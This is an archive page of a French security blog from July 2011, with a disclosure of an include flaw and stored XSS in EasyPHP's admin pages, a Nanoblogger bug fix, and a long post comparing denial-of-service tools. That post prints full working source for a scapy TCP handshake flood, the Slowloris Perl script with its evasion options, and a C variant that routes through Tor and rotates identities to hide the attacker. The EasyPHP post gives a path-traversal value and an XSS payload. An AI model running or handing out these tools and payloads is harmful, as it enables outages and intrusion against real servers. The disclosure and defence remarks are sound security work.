July 2011 Archives

20-07-2011 00:31:36

[Secu] Faille include + XSS permanente sur EasyPHP

2 petites vulnérabilités présentes dans la partie d'administration de EasyPHP (testé sur la dernière version 5.3.6.1) :

Tout d'abord une faille include présente dans le fichier <Installation de EasyPHP>\home\i18n.inc.php
En effet on peut voir le code suivant :
if (isset($_POST['lang']) AND $_POST['lang'] != $lang)
{
	$fp = fopen($filename, "r");
	$ini_contents = fread($fp, filesize($filename));
	fclose($fp);
	$ini_contents = str_replace("LangAdmin=".$lang, 
"LangAdmin=".$_POST['lang'], $ini_contents);
	$fp = fopen($filename, "w");
	fputs($fp,$ini_contents);
	fclose($fp);
	Header("Location: " . $_SERVER['PHP_SELF']); 
	exit;
}

include("i18n/" . $lang . ".php");
On constate donc que si l'on envoie une requete POST avec en variable lang=../../../repertoire/page on pourra alors écrire dans le fichier de config puis l'inclure. Pour rendre le code plus propre, il suffit de suivre les conseils de MadIrish.

Une 2e vulnérabilité est une XSS permanente sur la page d'admin (home) très utile pour faire une blague à un collègue lors d'une présentation devant un client :)
Rien de plus simple à mettre en place, il suffit de créer un répertoire dans www/ nommé par exemple :
pwet' onmouseover=alert(42) l
Pour la corriger, il suffit d'ouvrir le fichier <Installation de EasyPHP>\home\index.php et de corriger la ligne 71 en mettant :
$www_files[] = addslashes($file);
L'équipe de EasyPHP a été prevenue sans réponse à ce jour.

Posted by cloud | Permanent link | File under: Security, Coding

12-07-2011 01:29:24

[Coding] Bug argument cal de Nanoblogger

Comme vous l'avez constaté, j'utilise Nanoblogger pour publier. C'est assez geek mais j'aime bien. En ajoutant un article aujourd'hui, j'ai constaté l'erreur suivante qui s'affichait fréquemment, surtout pour la génération des RSS.
cal: illegal option -- h
usage: cal [-jy] [[month] year]
       cal [-j] [-m month] [year]
       ncal [-Jjpwy] [-s country_code] [[month] year]
       ncal [-Jeo] [year]
On voit qu'il utilise un argument -h qui n'existe pas quand on fait un man cal.
Objectif corriger cela.

Nanoblogger sous FreeBSD utilise la commande nb. On constate en ouvrant ce fichier (un script bash) le lien d'installation :
# where to expect nanoblogger's base
NB_BASE_DIR="/usr/local/share/nanoblogger"
On va donc aller dans ce répertoire et rechercher la commande cal avec un méchant grep
[root@serv /usr/local/share/nanoblogger]# grep -R cal *
...
plugins/calendar.sh:[ ! -z "$DATE_LOCALE" ] && 
CALENDAR=`LC_ALL="$DATE_LOCALE" $CAL_CMD $CAL_ARGS "$cal_month" 
"$cal_year"`
...
On observe donc un $CAL_CMD et un $CAL_ARGS. Comme on a une erreur d'argument sur un soi-disant -h, on va chercher cette variable.
[root@serv /usr/local/share/nanoblogger]# grep -R CAL_ARGS *
plugins/calendar.sh:: ${CAL_ARGS:=-h}
Bingo ! On modifie donc ce fichier en ne mettant aucune option à la place de -h et on update notre blog.
plugins/calendar.sh:: ${CAL_ARGS:=}
Ca marche :)

Posted by cloud | Permanent link | File under: FreeBSD, OpenSource, Coding

12-07-2011 00:13:59

[Secu] DoS type Slowloris via TOR

J'ai récemment vu un post qui m'a intéressé sur Fulldisclosure parlant du soi-disant leak de l'outils de the j3st3r, XerXes. Le code de cet outils est recherché par certain car semble offrir de forte capacité de DoS. Meme si au final, ce n'est pas ce code, il est intéressant et présente une évolution de Slowloris.

J'avais publié avant la publication de Slowloris un outils fonctionnant dans le meme esprit mais au final impactant plus d'applications car non focalisé sur les serveurs web. Je vais donc expliqué le fonctionnement du nouveau code publié et comparer les 3 outils.

Pour ce qui est de mon code que j'avais nommé "Tcp handshake flood", il réalise des TCP handshake avec le serveur cible sans enregistrer les sessions pour rester performant. Basé sur scapy, il envoie des SYN, lance un 2e thread qui sniff et répond aux SYN/ACK pour établir une connexion et rester en attente ce qui surcharge le serveur distant. Du coup il fonctionne très bien sur les serveurs Apache mais également sur d'autres serveurs comme SSH. Il n'envoie aucun payload comme le fait slowloris et reste donc plus "ouvert". Code de TCP Handshake Flood :
#!/usr/bin/env python

from scapy.all import *
import threading, sys
import pprint

try:
        print "TCP/IP DoS HandShake Flood PoC by cloud : 
http://blog.madpowah.org"
        hostname = sys.argv[1]
        dport = sys.argv[2]
        nbsyn = int(sys.argv[3])
        network = sys.argv[4]

except:
        print "Utilisation: ./handshake.py    "
        print "Exemple: ./handshake.py 192.168.0.1 80 65000 eth0"
        sys.exit(1)


def sendSyns():
        print ">> Sending SYN ..."
        sport = 6000

        while sport < 6000 + nbsyn:
                send(IP(dst=hostname,ttl=255)/ TCP(flags="S", 
sport=sport,dport=int(dport), seq=sport), verbose=0)
                sport += 1

def startSniff():
    print ">> Start sniff ..."
    nbcount = nbsyn*10
    filterport = "port " + dport
    sniff(iface=network,filter=filterport, prn=lambda x: getNumSeq(x), 
count=nbcount)

def getNumSeq(packet):

	if packet.getlayer('TCP')  is not None:	
       		flag = packet.getlayer('TCP').flags
      		if flag == 18:
			numseq = packet.getlayer('TCP').ack
			numack = packet.getlayer('TCP').seq + 1
			srcport = packet.getlayer('TCP').dport
                	send(IP(dst=hostname,ttl=255) / TCP(flags="A", 
sport=srcport, dport=int(dport), seq=numseq, ack=numack), verbose=0)
                	print "ACK %d" % (numseq)

t1 = threading.Thread(target = startSniff, args = ())
t2 = threading.Thread(target = sendSyns, args = ())

t1.start()
t2.start()
Le gros inconvénient est qu'il ne permet pas dans l'état de spoofer une adresse et on est donc fortement susceptible d'etre identifié et l'ip source peut facilement etre bloquée. Par ailleurs, il necessite de bloquer tous les paquets de type RST avant le lancement du script
iptables -A OUTPUT -o eth0 -p tcp --tcp-flags RST RST -j DROP


Slowloris est écrit en perl et crée de nombreux thread se connectant à un serveur web avec un payload puis ne fait plus rien pour laisser la socket ouverte et surcharger le serveur. Il est très efficace sur les serveurs web mais par exemple ne fait rien sur un serveur SSH si on ne modifie pas un peu le code. Par ailleurs il ne permet également pas de spoofer l'adresse source. Code de Slowloris :
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;

$SIG{'PIPE'} = 'IGNORE';    #Ignore broken pipe errors

print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... 
....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c.      .  
.coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. .  ...cO888Oc..          
:oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:.       .O8888C:  .oCOo.  
...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo:       :. 
.:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... ..  :cO8Oc. . .....  :.  
.:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::..  ....  
..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:...  
....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... 
...:::cccc:cooo
 ..... ............. .coocoooCCoco:::ccccccc:::ccc::..........  
....:::cc::::coC
   .  . ...    .... ..  .:cccoCooc:..  ::cccc:::c:.. ......... 
......::::c:cccco
  .  .. ... ..    .. ..   ..:...:cooc::cccccc:.....  .........  
.....:::::ccoocc
       .   .         .. ..::cccc:.::ccoocc:. ........... ..  . 
..:::.:::::::ccco
 Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP 
client
EOTEXT

my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, 
$connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
    'shost=s'   => \$shost,
    'dns=s'     => \$host,
    'httpready' => \$httpready,
    'num=i'     => \$connections,
    'cache'     => \$cache,
    'port=i'    => \$port,
    'https'     => \$ssl,
    'tcpto=i'   => \$tcpto,
    'test'      => \$test,
    'timeout=i' => \$timeout,
    'version'   => \$version,
);

if ($version) {
    print "Version 0.7\n";
    exit;
}

unless ($host) {
    print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
    print "\n\tType 'perldoc $0' for help with options.\n\n";
    exit;
}

unless ($port) {
    $port = 80;
    print "Defaulting to port 80.\n";
}

unless ($tcpto) {
    $tcpto = 5;
    print "Defaulting to a 5 second tcp connection timeout.\n";
}

unless ($test) {
    unless ($timeout) {
        $timeout = 100;
        print "Defaulting to a 100 second re-try timeout.\n";
    }
    unless ($connections) {
        $connections = 1000;
        print "Defaulting to 1000 connections.\n";
    }
}

my $usemultithreading = 0;
if ( $Config{usethreads} ) {
    print "Multithreading enabled.\n";
    $usemultithreading = 1;
    use threads;
    use threads::shared;
}
else {
    print "No multithreading capabilites found!\n";
    print "Slowloris will be slower than normal as a result.\n";
}

my $packetcount : shared     = 0;
my $failed : shared          = 0;
my $connectioncount : shared = 0;

srand() if ($cache);

if ($shost) {
    $sendhost = $shost;
}
else {
    $sendhost = $host;
}
if ($httpready) {
    $method = "POST";
}
else {
    $method = "GET";
}

if ($test) {
    my @times = ( "2", "30", "90", "240", "500" );
    my $totaltime = 0;
    foreach (@times) {
        $totaltime = $totaltime + $_;
    }
    $totaltime = $totaltime / 60;
    print "This test could take up to $totaltime minutes.\n";

    my $delay   = 0;
    my $working = 0;
    my $sock;

    if ($ssl) {
        if (
            $sock = new IO::Socket::SSL(
                PeerAddr => "$host",
                PeerPort => "$port",
                Timeout  => "$tcpto",
                Proto    => "tcp",
            )
          )
        {
            $working = 1;
        }
    }
    else {
        if (
            $sock = new IO::Socket::INET(
                PeerAddr => "$host",
                PeerPort => "$port",
                Timeout  => "$tcpto",
                Proto    => "tcp",
            )
          )
        {
            $working = 1;
        }
    }
    if ($working) {
        if ($cache) {
            $rand = "?" . int( rand(99999999999999) );
        }
        else {
            $rand = "";
        }
        my $primarypayload =
            "GET /$rand HTTP/1.1\r\n"
          . "Host: $sendhost\r\n"
          . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 
5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 
3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
          . "Content-Length: 42\r\n";
        if ( print $sock $primarypayload ) {
            print "Connection successful, now comes the waiting 
game...\n";
        }
        else {
            print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
            print "Is something wrong?\nDying.\n";
            exit;
        }
    }
    else {
        print "Uhm... I can't connect to $host:$port.\n";
        print "Is something wrong?\nDying.\n";
        exit;
    }
    for ( my $i = 0 ; $i <= $#times ; $i++ ) {
        print "Trying a $times[$i] second delay: \n";
        sleep( $times[$i] );
        if ( print $sock "X-a: b\r\n" ) {
            print "\tWorked.\n";
            $delay = $times[$i];
        }
        else {
            if ( $SIG{__WARN__} ) {
                $delay = $times[ $i - 1 ];
                last;
            }
            print "\tFailed after $times[$i] seconds.\n";
        }
    }

    if ( print $sock "Connection: Close\r\n\r\n" ) {
        print "Okay that's enough time. Slowloris closed the socket.\n";
        print "Use $delay seconds for -timeout.\n";
        exit;
    }
    else {
        print "Remote server closed socket.\n";
        print "Use $delay seconds for -timeout.\n";
        exit;
    }
    if ( $delay < 166 ) {
        print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it 
generally 
takes between 200-500 threads for most servers and assuming any latency 
at 
all...  you might have trouble using Slowloris against this target.  You 
can 
tweak the -timeout flag down to less than 10 seconds but it still may 
not 
build the sockets in time.
EOSUCKS2BU
    }
}
else {
    print
"Connecting to $host:$port every $timeout seconds with $connections 
sockets:\n";

    if ($usemultithreading) {
        domultithreading($connections);
    }
    else {
        doconnections( $connections, $usemultithreading );
    }
}

sub doconnections {
    my ( $num, $usemultithreading ) = @_;
    my ( @first, @sock, @working );
    my $failedconnections = 0;
    $working[$_] = 0 foreach ( 1 .. $num );    #initializing
    $first[$_]   = 0 foreach ( 1 .. $num );    #initializing
    while (1) {
        $failedconnections = 0;
        print "\t\tBuilding sockets.\n";
        foreach my $z ( 1 .. $num ) {
            if ( $working[$z] == 0 ) {
                if ($ssl) {
                    if (
                        $sock[$z] = new IO::Socket::SSL(
                            PeerAddr => "$host",
                            PeerPort => "$port",
                            Timeout  => "$tcpto",
                            Proto    => "tcp",
                        )
                      )
                    {
                        $working[$z] = 1;
                    }
                    else {
                        $working[$z] = 0;
                    }
                }
                else {
                    if (
                        $sock[$z] = new IO::Socket::INET(
                            PeerAddr => "$host",
                            PeerPort => "$port",
                            Timeout  => "$tcpto",
                            Proto    => "tcp",
                        )
                      )
                    {
                        $working[$z] = 1;
                        $packetcount = $packetcount + 3;  #SYN, SYN+ACK, 
ACK
                    }
                    else {
                        $working[$z] = 0;
                    }
                }
                if ( $working[$z] == 1 ) {
                    if ($cache) {
                        $rand = "?" . int( rand(99999999999999) );
                    }
                    else {
                        $rand = "";
                    }
                    my $primarypayload =
                        "$method /$rand HTTP/1.1\r\n"
                      . "Host: $sendhost\r\n"
                      . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; 
Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET 
CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
                      . "Content-Length: 42\r\n";
                    my $handle = $sock[$z];
                    if ($handle) {
                        print $handle "$primarypayload";
                        if ( $SIG{__WARN__} ) {
                            $working[$z] = 0;
                            close $handle;
                            $failed++;
                            $failedconnections++;
                        }
                        else {
                            $packetcount++;
                            $working[$z] = 1;
                        }
                    }
                    else {
                        $working[$z] = 0;
                        $failed++;
                        $failedconnections++;
                    }
                }
                else {
                    $working[$z] = 0;
                    $failed++;
                    $failedconnections++;
                }
            }
        }
        print "\t\tSending data.\n";
        foreach my $z ( 1 .. $num ) {
            if ( $working[$z] == 1 ) {
                if ( $sock[$z] ) {
                    my $handle = $sock[$z];
                    if ( print $handle "X-a: b\r\n" ) {
                        $working[$z] = 1;
                        $packetcount++;
                    }
                    else {
                        $working[$z] = 0;
                        #debugging info
                        $failed++;
                        $failedconnections++;
                    }
                }
                else {
                    $working[$z] = 0;
                    #debugging info
                    $failed++;
                    $failedconnections++;
                }
            }
        }
        print
"Current stats:\tSlowloris has now sent $packetcount packets 
successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
        sleep($timeout);
    }
}

sub domultithreading {
    my ($num) = @_;
    my @thrs;
    my $i                    = 0;
    my $connectionsperthread = 50;
    while ( $i < $num ) {
        $thrs[$i] =
          threads->create( \&doconnections, $connectionsperthread, 1 
);
        $i += $connectionsperthread;
    }
    my @threadslist = threads->list();
    while ( $#threadslist > 0 ) {
        $failed = 0;
    }
}

__END__

=head1 TITLE

Slowloris

=head1 VERSION

Version 0.7 Beta

=head1 DATE

06/17/2009

=head1 AUTHOR

RSnake <h@ckers.org> with threading from John Kinsella

=head1 ABSTRACT

Slowloris both helps identify the timeout windows of a HTTP server or 
Proxy server, can bypass httpready protection and ultimately performs a 
fairly low bandwidth denial of service.  It has the added benefit of 
allowing the server to come back at any time (once the program is 
killed), and not spamming the logs excessively.  It also keeps the load 
nice and low on the target server, so other vital processes don't die 
unexpectedly, or cause alarm to anyone who is logged into the server for 
other reasons.

=head1 AFFECTS

Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?

=head1 NOT AFFECTED

IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?

=head1 DESCRIPTION

Slowloris is designed so that a single machine (probably a Linux/UNIX 
machine since Windows appears to limit how many sockets you can have 
open at any given time) can easily tie up a typical web server or proxy 
server by locking up all of it's threads as they patiently wait for more 
data.  Some servers may have a smaller tolerance for timeouts than 
others, but Slowloris can compensate for that by customizing the 
timeouts.  There is an added function to help you get started with 
finding the right sized timeouts as well.

As a side note, Slowloris does not consume a lot of resources so modern 
operating systems don't have a need to start shutting down sockets when 
they come under attack, which actually in turn makes Slowloris better 
than a typical flooder in certain circumstances.  Think of Slowloris as 
the HTTP equivalent of a SYN flood.

=head2 Testing

If the timeouts are completely unknown, Slowloris comes with a mode to 
help you get started in your testing:

=head3 Testing Example:

./slowloris.pl -dns www.example.com -port 80 -test

This won't give you a perfect number, but it should give you a pretty 
good guess as to where to shoot for.  If you really must know the exact 
number, you may want to mess with the @times array (although I wouldn't 
suggest that unless you know what you're doing).

=head2 HTTP DoS

Once you find a timeout window, you can tune Slowloris to use certain 
timeout windows.  For instance, if you know that the server has a 
timeout of 3000 seconds, but the the connection is fairly latent you may 
want to make the timeout window 2000 seconds and increase the TCP 
timeout to 5 seconds.  The following example uses 500 sockets.  Most 
average Apache servers, for instance, tend to fall down between 400-600 
sockets with a default configuration.  Some are less than 300.  The 
smaller the timeout the faster you will consume all the available 
resources as other sockets that are in use become available - this would 
be solved by threading, but that's for a future revision.  The closer 
you can get to the exact number of sockets, the better, because that 
will reduce the amount of tries (and associated bandwidth) that 
Slowloris will make to be successful.  Slowloris has no way to identify 
if it's successful or not though.

=head3 HTTP DoS Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 
-tcpto 5

=head2 HTTPReady Bypass

HTTPReady only follows certain rules so with a switch Slowloris can 
bypass HTTPReady by sending the attack as a POST verses a GET or HEAD 
request with the -httpready switch. 

=head3 HTTPReady Bypass Example

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 
-tcpto 5 -httpready

=head2 Stealth Host DoS

If you know the server has multiple webservers running on it in virtual 
hosts, you can send the attack to a seperate virtual host using the 
-shost variable.  This way the logs that are created will go to a 
different virtual host log file, but only if they are kept separately.

=head3 Stealth Host DoS Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 
1 -shost www.virtualhost.com

=head2 HTTPS DoS

Slowloris does support SSL/TLS on an experimental basis with the -https 
switch.  The usefulness of this particular option has not been 
thoroughly tested, and in fact has not proved to be particularly 
effective in the very few tests I performed during the early phases of 
development.  Your mileage may vary.

=head3 HTTPS DoS Example:

./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 
-https

=head2 HTTP Cache

Slowloris does support cache avoidance on an experimental basis with the 
-cache switch.  Some caching servers may look at the request path part 
of the header, but by sending different requests each time you can abuse 
more resources.  The usefulness of this particular option has not been 
thoroughly tested.  Your mileage may vary.

=head3 HTTP Cache Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache

=head1 Issues

Slowloris is known to not work on several servers found in the NOT 
AFFECTED section above and through Netscalar devices, in it's current 
incarnation.  They may be ways around this, but not in this version at 
this time.  Most likely most anti-DDoS and load balancers won't be 
thwarted by Slowloris, unless Slowloris is extremely distrubted, 
although only Netscalar has been tested. 

Slowloris isn't completely quiet either, because it can't be.  Firstly, 
it does send out quite a few packets (although far far less than a 
typical GET request flooder).  So it's not invisible if the traffic to 
the site is typically fairly low.  On higher traffic sites it will 
unlikely that it is noticed in the log files - although you may have 
trouble taking down a larger site with just one machine, depending on 
their architecture.

For some reason Slowloris works way better if run from a *Nix box than 
from Windows.  I would guess that it's probably to do with the fact that 
Windows limits the amount of open sockets you can have at once to a 
fairly small number.  If you find that you can't open any more ports 
than ~130 or so on any server you test - you're probably running into 
this "feature" of modern operating systems.  Either way, this program 
seems to work best if run from FreeBSD.  

Once you stop the DoS all the sockets will naturally close with a flurry 
of RST and FIN packets, at which time the web server or proxy server 
will write to it's logs with a lot of 400 (Bad Request) errors.  So 
while the sockets remain open, you won't be in the logs, but once the 
sockets close you'll have quite a few entries all lined up next to one 
another.  You will probably be easy to find if anyone is looking at 
their logs at that point - although the DoS will be over by that point 
too.

=head1 What is a slow loris?

What exactly is a slow loris?  It's an extremely cute but endangered 
mammal that happens to also be poisonous.  Check this out:

http://www.youtube.com/watch?v=rLdQ3UhLoD4
SanguineRose / William Welna a donc eu l'idée de partir sur une attaque de type Slowloris mais en envoyant un payload générique (0x00) et en utilisant des tunnels TOR qu'il va changer durant l'attaque. Ainsi l'adresse source est spoofée et en plus change plusieurs fois durant l'attaque ce qui simule presque un DDoS avec une seule machine. Par ailleurs il reste assez générique comme Tcp Handshake Flood et permet d'etre efficace sur un serveur autre que web. Par contre il est beaucoup moins efficace que slowloris sur du web, cela dépend probablement du chemin du tunnel TOR qui sera emprunté. De plus on constate en sniffant le traffic que les ip source varient mais peu, c'est à dire environ toutes les 15-20s ce qui est trop faible pour simuler vraiment un DDoS. Il est par contre également efficace contre un serveur SSH très rapidement. Code de Slowloris with a twist over tor :
/* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 *                  Slowloris with a twist over tor
 * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 *
 * Due to the alpha version of this code being leaked I've decided
 * to release an improved version to fully show this method of
 * attack mostly free of the bugs / dependency on torsocks. This
 * attack works on a similar idea of slowloris only it sends packets
 * containing a single 0x00 and optionally nothing causing Apache
 * to keep the connection alive almost indefinitely. 
 *
 * Due to no one knowing how th3j35t3r's XerXes works I can not say
 * if this is the same method. This was one of my many ideas I was
 * exploring as to how it could possibly work that has some successful
 * results.
 *
 * - SanguineRose / William Welna
 *
 *                        Leaked Version
 *        http://seclists.org/fulldisclosure/2011/Jul/84
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <pthread.h>

/* Re-connecting to tor sometimes takes a while, in order for this to be 
effective it requires
 * mass amounts of threads handling only a few connections each, since 
this is a POC I will leave
 * it up to others to fix that. It also has limited success/attack 
lengths due to tor being slow
 */
#define CONNECTIONS 3
#define THREADS 148

typedef struct {
	const char *host, *port;
} thread_args;

// Simple debug function
void dump_array(char *name, char *data, int size) {
	int x, z, indent = strlen(name) + 2;
	fprintf(stderr, "%s { ", name);
	for(x=0; x < size; x++) {
		for(z=0; z < indent; z++)
			putc(0x20, stderr);
		fprintf(stderr, "%20x\n", data[x]);
	}
	fprintf(stderr, "};\n");
}

int make_socket(const char *host, const char *port) {
	struct addrinfo hints, *servinfo, *p;
	int sock, r, y=1;
	memset(&hints, 0, sizeof(hints));
	hints.ai_family = AF_UNSPEC;
	hints.ai_socktype = SOCK_STREAM;
	if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
		fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
		return -1;
	}
	for(p = servinfo; p != NULL; p = p->ai_next) {
		if((sock = socket(p->ai_family, p->ai_socktype, 
p->ai_protocol)) == -1) {
			continue;
		}
		setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &y, 4);
		if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
			close(sock);
			continue;
		}
		break;
	}
	if(p == NULL) {
		if(servinfo)
			freeaddrinfo(servinfo);
		return -2;
	}
	if(servinfo)
		freeaddrinfo(servinfo);
	return sock;
}

/* Opens SOCKS5 connection to tor
 * I also dedicate this function to pr0f <3
 */
int pr0f_loves_me_tor_connect(const char *host, const char *port) {
	char *buf = calloc(1024, sizeof(char));
	short l = strlen(host), t;
	int x, sock;
	fprintf(stderr, "[Connect %s:%s]\n", host, port);
	if((sock=make_socket("127.0.0.1", "9050"))<0) {
		free(buf);
		return sock;
	}
	write(sock, "\x05\x01\x00", 3); // SOCKS5, 1 Authentication 
Method, No Auth/Plain
	read(sock, buf, 1024);
	if((buf[0] != 0x05) || (buf[1] == 0xFF) || (buf[1] != 0x00)) {
		free(buf);
		return -3; // Auth not accepted by socks server / wrong 
version
	}
	buf[0] = 0x05; buf[1] = 0x01; buf[2] = 0x00; buf[3] = 0x03; 
buf[4] = l;
	for(x=0; x < l; x++)
		buf[5+x] = host[x];
	x=l+5;
	t = htons(atoi(port));
	memcpy((buf+x), &t, 2);
	//dump_array("final_request", buf, x+2);
	write(sock, buf, x+2);// send request
	read(sock, buf, 1024);
	if((buf[0] == 0x05) && (buf[1] == 0x00)) { // connection 
granted/success
		free(buf);
		return sock;
	}
	free(buf);
	return -4; // Unable to conect
}

// This is for the SIGPIPE error on bad connections / premature closing
void broke(int s) {
	// do nothing
}

void *attack(void *arg) {
	thread_args *a = (thread_args *)arg;
	int x, r, socks[CONNECTIONS];
	fprintf(stderr, "[Thread Started]\n");
	for(x=0; x < CONNECTIONS; x++)
		socks[x]=0;
	signal(SIGPIPE, &broke);
	while(1) {
		for(x=0; x < CONNECTIONS; x++) {
			if(socks[x] <= 0) {
				socks[x] = 
pr0f_loves_me_tor_connect(a->host, a->port);
				fprintf(stderr, "[Socket Returned 
%i]\n", socks[x]);
			}
			if(write(socks[x], "\0", 1) < 0) {
				close(socks[x]);
				fprintf(stderr, "[Socket Error Returned 
%i]\n", socks[x]);
				socks[x] = 
pr0f_loves_me_tor_connect(a->host, a->port);
			}
		}
		usleep(100000);
	}
}

void do_help(char *n) {
	fprintf(stderr, "Usage: %s <ip/hostname> <port>\n");
	exit(0);
}

void *cycle_identity() {
	int sock = make_socket("localhost", "9051");
	char *shit_bucket = calloc(1024, sizeof(char));
	if(sock < 0) {
		fprintf(stderr, "Can't connect to tor control port\n");
		free(shit_bucket);
		pthread_exit(NULL);
	}
	write(sock, "AUTHENTICATE \"\"\n", 16);
	while(1) {
		write(sock, "signal NEWNYM\n", 15);
		fprintf(stderr, "[cycle_identity -> signal 
NEWNYM\n");
		read(sock, shit_bucket, 1024);
		sleep(5);
	}
}

int main(int argc, char **argv) {
	pthread_t threads[THREADS];
	pthread_t cycle_tid;
	thread_args arg;
	void *status;
	int x;
	if(argc != 3)
		do_help(argv[0]);
	arg.host = (const char *)argv[1];
	arg.port = (const char *)argv[2];
	pthread_create(&cycle_tid, NULL, cycle_identity, NULL);
	for(x=0; x < THREADS; x++) {
		pthread_create(&threads[x], NULL, attack, &arg);
		usleep(200000);
	}
	for(x=0; x < THREADS; x++)
		pthread_join(threads[x], &status);
	pthread_kill(cycle_tid, 15);
	pthread_exit(NULL);
	return 0;
}
Il n'existe donc pas encore d'attaque de type DoS parfaite mais le choix de l'outil dépend de l'objectif et du niveau de discrétion souhaité. On pourrait également imaginé un cumul des méthodes pour augmenter l'efficacité et noyer notre IP parmi d'autres. Je pense que l'ajout d'une règle de firewall comme je l'avais indiqué dans mon précédent article devrait toujours empecher toutes ces attaques d'aboutir.

Posted by cloud | Permanent link | File under: Security, Coding